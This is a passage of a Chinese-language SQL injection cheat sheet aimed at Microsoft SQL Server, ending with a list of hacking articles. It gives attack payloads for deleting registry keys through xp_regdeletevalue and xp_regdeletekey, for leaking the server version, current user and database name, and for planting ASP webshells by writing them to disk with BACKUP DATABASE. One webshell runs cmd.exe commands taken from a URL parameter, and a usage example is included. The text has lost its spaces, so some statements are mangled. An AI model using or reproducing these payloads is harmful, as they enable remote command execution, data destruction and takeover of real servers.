SQL注入技巧资料大全

execxp_regdeletevalue'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName'删除某个值

xp_regdeletekey'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionTestkey'删除键,包括该键下所有值

14.mssql的backup创建webshell

usemodel

createtablecmd(strimage);

insertintocmd(str)values('<%DimoScript%>');

backupdatabasemodeltodisk='c:l.asp';

15.mssql内置函数

;and(select@@version)>0获得Windows的版本号

;anduser_name()='dbo'判断当前系统的连接用户是不是sa

;and(selectuser_name())>0爆当前系统的连接用户

;and(selectdb_name())>0得到当前连接的数据库

16.简洁的webshell

usemodel

createtablecmd(strimage);

insertintocmd(str)values('<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>');

backupdatabasemodeltodisk='g:wwwtestl.asp';

请求的时候，像这样子用：

http://ip/l.asp?c=dir　

参考资料（自己GOOGLE）

SQL注入天书-ASP注入漏洞全接触(小竹)

MSSQL跨库查询(臭要饭的!黑夜)

榨干MSSQL最后一滴血

SQL语句参考及记录集对象详解

关于SQLServer中存储过程

利用mssqlbackup创建webshell

SQL_Injection高级应用

跨站式SQL注入(老凯(laokai))

怪异的SQL注入(AMANL)

SQLServer应用程序中的高级SQL注入(翻译：青野志狼)

如何利用Sql注入遍历目录(sinkaQQ:20355)

SQLInjection技巧的演练(翻译人:demonalex)

SQL数据库的一些攻击

SQLInjection攻击技术(JSW)

SQL_Injection高级应用(apachy)

SQL注入的不常见方法(桂林老兵)

Backupashell

谈php+mysql注射语句构造(黑嘿黑·≯Super·Hei)

AdvancedSQLInjectionwithMySQL(angel)

L'injection(My)SQLviaPHP

OracleSQL语言